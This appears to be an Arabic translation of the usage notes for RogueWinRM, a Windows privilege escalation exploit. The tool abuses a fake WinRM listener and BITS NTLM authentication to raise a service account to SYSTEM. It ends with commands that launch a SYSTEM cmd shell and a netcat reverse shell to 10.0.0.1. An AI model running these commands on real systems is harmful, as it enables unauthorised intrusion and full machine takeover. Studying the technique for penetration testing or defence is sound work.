
تصعيد الامتيازات المحلية في ويندوز من حساب الخدمة إلى النظام
RogueWinRM هو استغلال لتوسيع الصلاحيات محليًا يتيح الترقية من حساب خدمة (مع صلاحية SeImpersonatePrivilege) إلى حساب النظام المحلي إذا كانت خدمة WinRM غير قيد التشغيل (افتراضيًا على Win10 ولكن ليس على Windows Server 2019).
باختصار، سيستمع للاتصالات الواردة على المنفذ 5985 متظاهرًا بأنه خدمة WinRM حقيقية.
إنه مجرد خادم ويب ضئيل يحاول التفاوض على مصادقة NTLM مع أي خدمة تحاول الاتصال على ذلك المنفذ.
ثم يتم تشغيل خدمة BITS (التي تعمل كحساب النظام المحلي) وستحاول المصادقة على المستمع المزيف. بمجرد المصادقة على المستمع المزيف، نكون قادرين على انتحال هوية مستخدم النظام المحلي لإطلاق عملية عشوائية بتلك الصلاحيات.
يمكنك العثور على وصف تقني كامل لهذه الثغرة على هذا الرابط --> https://decoder.cloud/2019/12/06/we-thought-they-were-potatoes-but-they-were-beans/
RogueWinRM
Mandatory args:
-p <program>: program to launch
Optional args:
-a <argument>: command line argument to pass to program (default NULL)
-l <port>: listening port (default 5985 WinRM)
-d : Enable Debugging output

تشغيل واجهة cmd تفاعلية:
RogueWinRM.exe -p C:\windows\system32\cmd.exe
تشغيل reverse shell باستخدام netcat:
RogueWinRM.exe -p C:\windows\temp\nc64.exe -a "10.0.0.1 3001 -e cmd"